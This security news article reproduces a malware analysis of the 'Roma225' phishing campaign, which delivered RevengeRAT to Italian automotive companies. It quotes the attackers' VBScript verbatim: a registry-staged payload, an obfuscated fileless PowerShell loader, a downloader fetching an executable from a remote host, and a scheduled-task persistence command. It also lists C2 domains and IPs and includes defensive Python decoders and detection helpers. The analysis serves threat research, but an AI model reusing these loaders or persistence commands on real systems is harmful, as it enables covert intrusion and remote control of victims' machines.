‘Roma225’ campaign targets companies in the Italian automotive sector

Pierluigi Paganini December 31, 2018

‘Roma225’ campaign - The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the Italian automotive sector.

The malware was spread through a well-written phishing email trying to impersonate a senior partner of one of the major Brazilian business law firms, “Veirano Advogados”.

The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension), armed with auto-open VBA macro code.

Figure 1. Popup displayed at the .ppa file opening

Technical analysis

The macro code in the .ppa file contains a simple instruction invoking the “mshta.exe” tool to download and execute the next stage of the dropper, retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.]com/”.

Figure 2. Macro extracted from .ppa document

The Blogspot-hosted web page downloaded by mshta.exe appears innocent to a quick skim: opening it in the browser shows a perfectly rendered work-in-progress blog page.

Figure 3. Home page of the Blogger drop url

But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code.

Figure 4. Visual Basic Script hidden behind the web page

It’s amusing to see that the malware author tried to attribute authorship of the script to “Microsoft Corp.”, adding comments belonging to legitimate Microsoft utilities:

'Update———————————————————————————————
' Copyright: Microsoft Corp.
'
' This script is designed to be used only for scheduled tasks(s).
' There is no extensive error check, and will not dump the output from the Powershell CmdLet.
'
' Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}

These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed on Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. The remaining part of the script, however, is responsible for executing a series of malicious actions:

  • Store a base64-encoded version of the “RevengeRAT” payload in the registry key located at “HKCU\AppEvents\Values”
CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
  • Decode and execute the stored payload
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" 
A0102030405.run CDT0908087CDT, vbHide
  • Create and execute another VBScript in “%AppData%\Local\Temp\Z3j.vbs”, capable of downloading a new payload from the remote destination “hxxp://cdtmaster.com[.]br”
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[Z@<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs  &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
  • Finally, create a new scheduled task that runs the “mshta.exe” utility again with the “hxxps://pocasideiascdt.blogspot[.]com/” parameter every two hours. This URL points to a web page that is actually a mirror of the “hxxps://minhacasaminhavidacdt.blogspot[.]com/” one.
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
Figure 5. Scheduled task for persistency
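The Z3j.vbs stage above hides its COM object names and the output file name behind a fixed shift of every character code by 14 (the M5t function), and the first stage parks a base64-encoded executable in HKCU\AppEvents\Values so PowerShell can load it from memory. The following Python helper is an added example for analysts, not code from the article or from Cybaze-Yoroi: it reverses the shift on the four obfuscated literals quoted in the script, and it checks whether a registry string value begins with a base64-encoded MZ header, using the prefix of the value shown above. The function names are my own.

```python
"""Analyst helper (added example, not from the article): undo the Chr(Asc(c) - 14)
string obfuscation used by the Z3j.vbs stage and spot a PE staged in a registry
string value, as the first stage does with HKCU\\AppEvents\\Values."""
import base64
import binascii

SHIFT = 14  # M5t() in Z3j.vbs computes Chr(Asc(E0k) - 14) for every character


def decode_m5t(obfuscated: str) -> str:
    """Reverse the attacker's transform: subtract 14 from each character code."""
    return "".join(chr(ord(ch) - SHIFT) for ch in obfuscated)


def encode_m5t(plain: str) -> str:
    """Forward transform, useful to confirm a candidate string round-trips."""
    return "".join(chr(ord(ch) + SHIFT) for ch in plain)


# Obfuscated literals copied verbatim from the Z3j.vbs stage quoted in the article.
OBFUSCATED_STRINGS = [
    "R]Qc[S\\b<SfS",     # file name the downloaded payload is saved as
    "[af[Z@<f[ZVbb^",    # COM object used for the HTTP request
    "USb",               # HTTP method
    "OR]RP<ab`SO[",      # COM object used to write the response body to disk
]


def decode_all(strings=OBFUSCATED_STRINGS) -> dict:
    """Map each obfuscated literal to its cleartext."""
    return {s: decode_m5t(s) for s in strings}


def looks_like_pe_in_base64(value: str) -> bool:
    """True when a registry string value starts with a base64-encoded 'MZ'
    DOS header. Only the first 8 base64 characters are decoded, so a value
    truncated like the article's excerpt ("TVqQAAMAAAAEAAAA//8AALgAAA...")
    is still recognised."""
    head = value.strip()[:8]
    if len(head) < 8:
        return False
    try:
        raw = base64.b64decode(head, validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(b"MZ")


if __name__ == "__main__":
    for obf, clear in decode_all().items():
        print(f"{obf!r:22} -> {clear}")
    # Prefix of the value the script writes to HKCU\AppEvents\Values (from the article)
    print("staged PE in registry:", looks_like_pe_in_base64("TVqQAAMAAAAEAAAA//8AALgAAA"))
```

Decoding the four literals recovers the file name the second payload is saved under, the MSXML2.XMLHTTP and ADODB.STREAM objects used to fetch and write it, and the GET verb; the same one-line transform works for any other string the same builder shifts. The registry check is deliberately prefix-only so it can be applied to values exported from a live system or from a forensic hive copy without decoding the whole payload.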

Summing up, the last stages of the infection chain are designed to install a RevengeRAT variant hidden in a registry key and to run the “outlook.exe” executable extracted by the “Document.exe” binary, retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.

The following image briefly shows the malware infection chain:

Figure 6. Roma225 infection chain

RevengeRAT Payload

Once executed, the RAT immediately contacts its command and control servers, sending the victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net”.

Figure 7. Configuration of the RevengeRAT

If one of these is down, the malware falls back to the other one. At the time of writing, both remote C2s were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT.

In any case, the malware establishes a TCP connection with the server and sends it the following stream:

Figure 8. RevengeRAT check-in data

At first sight, it’s possible to spot a repeated sequence of characters used as a separator between the data fields:

roma225

This string was chosen by the attacker during the preparation of the malware, using the customization features provided by the RevengeRAT builder. Splitting and decoding the data stream, the information becomes clearer:

Figure 9. Decoded check-in data
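As an added illustration of the splitting-and-decoding step just described (this is not code from the article, and the check-in below is constructed, not captured traffic), the following Python snippet cuts a stream on the “roma225” separator and decodes each field. It assumes the builder base64-encodes every field, which this page does not state and is therefore my assumption; a field that does not decode cleanly is kept verbatim. The separator-count rule at the end is a crude content check a defender can run over captured TCP payloads to flag similar check-ins.

```python
"""Added example (not from the article): split a RevengeRAT-style check-in on its
customised separator, decode the fields, and flag payloads that look like one."""
import base64
import binascii

SEPARATOR = "roma225"  # separator observed in the check-in stream (Figure 8)


def _try_b64(field: str) -> str:
    """Decode a field as base64 text when it is valid base64 and valid UTF-8
    (assumption: the builder base64-encodes each field); otherwise return the
    field unchanged so nothing is silently lost."""
    try:
        return base64.b64decode(field, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return field


def parse_checkin(stream: str, separator: str = SEPARATOR) -> list:
    """Split the stream on the separator and decode every non-empty field."""
    return [_try_b64(f) for f in stream.split(separator) if f != ""]


def flag_streams(payloads, separator: str = SEPARATOR, min_fields: int = 3) -> list:
    """Return the indices of payloads that carry the separator at least
    (min_fields - 1) times, i.e. enough to delimit min_fields fields.
    One stray occurrence of the word is not enough to raise an alert."""
    return [i for i, p in enumerate(payloads) if p.count(separator) >= min_fields - 1]


# Constructed sample check-in (invented field values, not real victim data).
SAMPLE_FIELDS = ["Info", "WIN-ANALYST-VM", "analyst", "Microsoft Windows 10 Pro", "Roma225_sample"]
SAMPLE_STREAM = SEPARATOR.join(base64.b64encode(f.encode()).decode() for f in SAMPLE_FIELDS)

# Constructed payload set: the check-in, a benign HTTP request, a lone separator.
SAMPLE_PAYLOADS = [
    SAMPLE_STREAM,
    "GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
    "roma225",
]


if __name__ == "__main__":
    print("flagged payloads:", flag_streams(SAMPLE_PAYLOADS))
    for field in parse_checkin(SAMPLE_STREAM):
        print("  field:", field)
```

The separator is the only builder-specific value here, so swapping it (or reading it from a list of separators recovered from other samples) turns the same parser and rule into a small triage tool for sibling campaigns; the base64 fallback keeps the output honest when a sample encodes some fields differently.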

As noted before, the C2s were unresponsive at the time of writing; however, their latest IP resolutions indicate that the attacker’s infrastructure could be located in different countries.

For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP address, geolocated in Canada.

Moreover, “systen32.ddns[.]net” resolved to the 138.36.3.228 IP address, geolocated in Brazil.

Document.exe

The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is actually downloaded onto the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as its program icon, and its sole purpose is to deploy and run the “Outlook.exe” payload.

Extracting static PE information from this last sample reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, which, in addition to the “roma225” separator, is another direct reference to the Italian landscape.

Figure 10. Outlook.exe static information

When the “Outlook.exe” payload is executed, it remains apparently quiet, with no outgoing network traffic or file system modifications; however, it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356”.

Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.

Conclusions

After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as the Gorgon Group, the enigmatic threat actor tracked by Unit42 researchers and author of cyber espionage campaigns against UK, Spanish, Russian and US governmental organizations. However, the source code of the RAT was publicly leaked a few years ago and could actually be part of a multitude of cyber arsenals, more or less sophisticated.

Nevertheless, there are TTPs in common with the Unit42 report, such as the use of shared infrastructure (in this specific case the Blogger service) as a drop server and of other popular RATs as the final backdoor (e.g. njRAT).

In fact, “cdtmaster.com[.]br” hosts other suspicious files such as the “nj.mp3” binary, which is actually an njRAT variant. All the other files are still under investigation.

Figure 11. Malware hosted on cdtmaster.com[.]br

Technical details about the Roma225 campaign, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published on the Yoroi blog.


Pierluigi Paganini

(SecurityAffairs – Roma225, cyberespionage)

